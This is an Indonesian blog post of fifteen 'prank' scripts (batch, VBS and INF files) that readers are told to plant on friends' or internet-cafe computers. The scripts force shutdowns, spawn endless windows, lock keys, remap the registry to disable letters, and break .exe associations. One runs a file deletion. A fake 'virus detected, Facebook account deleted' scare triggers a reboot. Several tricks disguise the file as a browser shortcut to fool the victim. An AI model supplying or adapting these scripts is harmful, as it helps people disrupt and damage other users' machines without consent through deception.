,
Headlines News :
Home » » script jahil dari notepad

script jahil dari notepad

Written By Nanda Journey on Minggu, 20 November 2011 | 10.24

TRIK 1  - Membuat Forced Shoutdown
————————————————-
@echo off
msg * I don’t like you
shutdown -c “Error! You are too ******!” -s
————————————————-
simpan kode script yang berwarna Merah di Notepad dengan nama : xhack.BAT type file : All file
sebarkan File tersebut di Komputer teman Anda,
maka Komputer korban akan otomatis FORCED SHOUTDOWN
TRIK 2 – Membuat Tombol Caps Lock menyala terus-menerus
——————————————————————
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop
——————————————————-
seperti cara yang pertama, hanya berbeda kode script simpan kode yang berwarna biru di Notepad dengan nama : xhack.VBS type File : All File
sebarkan File berikut di Komputer korban maka, Tombol CAPSLOCK akan menyala terus-menerus
(bila dimatikan akan menyala lagi)
TRIK 3 – Membuat Pesan Jail mucul terus
——————————————————
@ECHO off
:Begin
msg * muka kamu sangat jelek
msg * ngaca dulu gih,
msg * hayo lo,cpu lu gw acak acak
msg * udah install ulang aja
msg * biar masalah nya kelar
GOTO BEGIN
——————————————————
simpan kode script yang berwarna hijau dengan nama xhack.BAT type file : All File
Cara ini sangat simple Jail, walaupun di close tab pesan ini masih muncul, kata katanya bisa diubah sesuai selera.
 
TRIK 4 – Jail dengan Membuka Tutup CD/DVD room
——————————————————
Set oWMP = CreateObject(“WMPlayer.OCX.7″)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop——————————————————-
simpan di Notepad kode berikut dengan nama : xhack.vbs type file : All File
maka DVD/CD roomnya akan membuka dan menutup otomatis,
TRIK 5 – Membuat script mucul terus menerus
——————————————————-
Set wshShell = wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “~(enter)”
loop
——————————————————-
simpan kode berikut di Notepad dengan nama : xhack.vbs type file : All File
membuat script bermunculan terus menerus
TRIK 6 – Membuat Tombol Backspace menjadi eror – menekan terus menerus
——————————————————–
MsgBox “kembali ke menu sebelumnya”
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop
———————————————————-
simpan kode script berikut di Notepad dengan nama : xhack.vbs type file : All File
maka Tombol Backspace akan eror dan menekan dengan sendirinya


TRIK 7 – Cara Membuat Pesan ‘ Komputer Anda Jelek Banget ‘ di Notepad/ Wordpad
———————————————————–
Set wshShell = wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “Komputer Anda Jelek Banget”
loop
———————————————————–
ganti kata Komputer Anda Jelek Banget dengan selera Anda, simpan di Notepad dengan nama : xhack.vbs
TRIK 8 – Cara Membuat Notepad Terbuka Otomatis – terus menerus
————————————————————
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
————————————————————
simpan di Notepad dengan nama : xhack.BAT
maka Notepad akan terbuka terus menerus
TRIK 9 – Membuat Notepad dengan Pesan Jail
————————————————————-

WScript.Sleep 1800
WScript.Sleep 100
Set WshShell = WScript.CreateObject(“WScript.Shell”)
WshShell.Run “notepad”
WScript.Sleep 10
WshShell.AppActivate “Notepad”
WScript.Sleep 50
WshShell.SendKeys “ka”
WScript.Sleep 50
WshShell.SendKeys “mu “
WScript.Sleep 50
WshShell.SendKeys “je”
WScript.Sleep 50
WshShell.SendKeys “le”
WScript.Sleep 50
WshShell.SendKeys “k “
WScript.Sleep 50
WshShell.SendKeys ” se”
WScript.Sleep 50
WshShell.SendKeys “ka”
WScript.Sleep 50
WshShell.SendKeys “li”
WScript.Sleep 50
WshShell.SendKeys ” y”
WScript.Sleep 50
WshShell.SendKeys “a”
WScript.Sleep 50
WshShell.SendKeys ” h”
WScript.Sleep 50
WshShell.SendKeys “!”
WScript.Sleep 50
WshShell.SendKeys “!! “
———————————————————–
simpan di Notepad dengan nama : xhack.vbs 
ganti kode yang berwarna merah sesuai dengan selera anda.


TRIK 10 – Cara Membuat Memilih jawaban seperti Quiz di Notepad
———————————————————–
@echo off
title quiz hari ini :)
:menu
cls
echo jika kamu kena virus apa
yang kamu lakukan
pause
echo pilih yang mana:
echo 1. matiin computer
echo 2. format aja
echo 3. bingung ahh
set input=nothing
set /p input=Choice:
if %input%==1 shutdown -s -t
30
if %input%==2 del c:xxx
if %input%==3 @ECHO off
msg * muka lo rusak
msg * ngaca dulu gih
msg * hayo lo,cpu lu gw acak2
msg * ud install ulang aja
msg * biar masalah nya kelar
@ECHO off
:top
START %SystemRoot%
system32notepad.exe
GOTO top ———————————————————–
simpan kode script berikut di Notepad dengan nama : xhack.BAT


TRIK 11 – Membuat Komputer Hang dengan Kode script Notepad
————————————————————-
start
start
start
start
start
start
start
start
start
start
start
start
———————————————————–
simpan di Notepad dengan nama : xhack.BAT
terus buat shortcut palsu terserah mau shortcut apa, aku saranin shortcutnya browser mozilla terus taro aja di desktop target
( efeknya akan membuka CDM yang banyak banget sampe layarnya keluar keluar )


TRIK 12 – Cara Mematikan Tombol Keyboard
————————————————————-
1. Salin baris-baris kode (script) berikut , paste pada Notepad dan simpan dengan nama JAIL.INF
Langsung kita mulai saja :
[Version]
Signature=”$Windows NT$”
[DefaultInstall]
AddReg =AIUEO
[AIUEO]
HKLM,”SYSTEM\CurrentControlSet\Control\Keyboard Layout”,”Scancode Map”,0×1,00,00,00,00,00,00,00,00,06,00,00,00,00,00,1e,00,00,00,12,00,00,00,
17,00,00,00,18,00,00,00,16,00,00,00,00,00
—————————————
2. Untuk menjalankannya, klik kanan nama file JAIL.INF dan pilih menu> Install
3. Log Off komputernya agar trik ini berfungsi.
NB :
Script diatas dimaksudkan untuk mematikan tombol A I U E O pada keyboard.
Untuk menormalkannya, silahkan salin script berikut :
—————————————
[Version]
Signature=”$Windows NT$”
[DefaultInstall]
DelReg =normal
[normal]
HKLM,”SYSTEM\CurrentControlSet\Control\Keyboard Layout”,”Scancode Map”
—————————————
—> Simpan dengan nama “NORMAL.INF
Klik kanan file ini, pilih >Install
Log Off komputernya.
sumber artikel hack : kidzoom
TRIK 13 – Software Buat Jahil – Nakal
——————————————————–

Software 1

Kalau yang ini nemu di Kaskus. Tapi dijamin seru banget.. Dan inilah fungsinya :
-freeze
-snow
-earthquake
-random colours
-mouse and lines
-puzzle
Lihat efeknya dibawah
  1. Puzzleimage
  2. Mouse And Linesimage
Masih banyak lagi deh.. Tapi jangan salah cara menghentikannya pun sulit loh.. Buka task manager gag bisa. Klik tombol start gag bisa.. So bagaimana, Cukup Tekan ESC doang kok.. hhee  Silahkan dicoba
Download : klik disini

Software 2

1Nah kalau yang ini namanya Key joke! Fungsinya bikin lampu disco nih.. Sama seperti script yang saya berikan dulu.  Tampilannya seperti yang disamping tuh.. Ini sih masih biasa gag kaya yang diatas tadi..
Ow iya tapi sebelumnya jangan kaget ye kalau ada pesan banyak seperti ini2Karena ini juga ulahnya ni software. Bisa di close kok..
Download :  Klik disini

Software 3

Wah kali ini parah banget nih. Bisa bikin stress juga. Sampai sekarang saya pun belum tau cara ngatasinnya. Nama softwarenya Stoerung, sepertinya bahasa jerman, pas install pun berbahasa jerman. Software ini meng-invert warna desktop kita berkali-kali secara berkala. Namun efeknya, menurut saya bisa merusak VGA card, dan ini juga bisa bikin komputer lemot.. Ini pun sama dengan software seblumnya. Dy mengeluarkan alert seperti software 2 namun lebih banyaka
Download : klik disini
Masih ada 46 software lagi yang bisa kalian download untuk ngerjain temen lw.. dan efeknya mantep2 juga loh! Lihat disini
http://www.rjlpranks.com/pranks/
sumber artikel :  kidzoom
TRIK 14 – Cara Merusak Komputer teman / Warnet
—————————————————————
buka cmd(comand prompt), kalo belum tahu nyari dimana , klik start-run-ketik CMD-Lalu ketikan script ini
ASSOC.exe=.hank
lalu enter!
!!!!
program kayak ms.word/game ngambek jalan ! , n jika sudah puas banget jailnya dan mau ngembaliin-nya , tinggal buka CMD lagi. lalu ketik
ASSOC.exe=EXEFILE
—————————————————————
TRIK 15 -  Cara Paling Jahil Jahat 
—————————————————————-
1. BUka program notepad atau biar cepet menu RUN ketik notepad lalu enter
2. Copy kode ini dan pastekan di notepad kamu
@echo off
msg * WARNING VIRUS DETECTED!!!!! AFTER 5 MINUTES YOUR FACEBOOK ACCOUNT WILL BE DELETED !!!!TO REMOVE THE VIRUS CLICK OK OR CLOSE THIS BOX!
PAUSE
shutdown -r -t 300 -c ” SORRY!!! YOUR FACEBOOK ACCOUNT ARE NOW BEING DELETED !!! PLEASE WAIT ………..”
3. Habis itu simpen file notepad ini dengan format *.bat = terserah mau diberi
nama apa, misal : pacebuk.bat dan SAVE di Dekstop (Recommended)
4. Sekarang klik kanan desktopmu dan pilih New => Shortcut
5. Setelah ini akan muncul sebuah tampilan dan klik browse lalu cari lokasi file
.bat yang kamu simpen tadi, misal tadi kamu save pada dekstop
6. Klik Next dan Rename dengan Mozilla Firefox (Untuk nama ini terserah kamu
dan bebas bisa ganti dengan Opera Mini atau Google Chrome, ini hanya
sebagai tipuan aja)
7.Bila semua langkah sudah oke, sekarang yang perlu kamu lakuin adalah
mengubah icon .bat tadi dalam bentuk Mozilla Firefox (karena kita sering pakai
Mozilla jadi pembahasannya pakai browser ini) .. Terus caranya gimana ?
Gampang.. tinggal kamu klik kanan file .bat tadi dan pilih change icon
Gak nemu icon mozilla ? Coba deh low cari di Program Files => Mozilla Firefox
Nah sekarang virus facebookmu telah jadi dengan sempurna, kalau kamu ingin
iseng nyoba tinggal di klik aja deh dan lihat perubahan yang akan terjadi ..
Harusnya pasti sedikit kaget dan coba low bayangin kalau trik ini kamu
praktekan di kompi temen kamu atau mungkin kompi kampus atau warnet..
what will happen ?  abis pastinya ..
NIH SCREENSHOOTNYA :
Anda sedang membaca artikel tentang script jahil dari notepad dan anda bisa menemukan artikel script jahil dari notepad ini dengan url http://hy-hack.blogspot.com/2011/11/script-jahil-dari-notepad.html,Dilarang menduplikat artikel ini script jahil dari notepad jika sangat bermanfaat hanya boleh sebagai artikel refrensi atau harus mengulas nya dengan bahasa / kalimat yang berbeda dan memberi link ini : script jahil dari notepad


Artikel Terkait:

Share this post :

Poskan Komentar

Blog Dofolow , Tapi Tolong jangan nyepam dan ada kata kata yang tidak baik

 
Support : Abaut Us | Contact Us | Privacy Policy | Term of Use | Redaksi | Advertise | Lowongan Kerja | Forum | Tabloit | Mobile Version | Hy Hack Toolbar
Copyright © 2011. HY hack - All Rights Reserved Template Created by Heykhend
Published by Heykhend Corp. Developed by PT Heykhend Publik Media (HPM)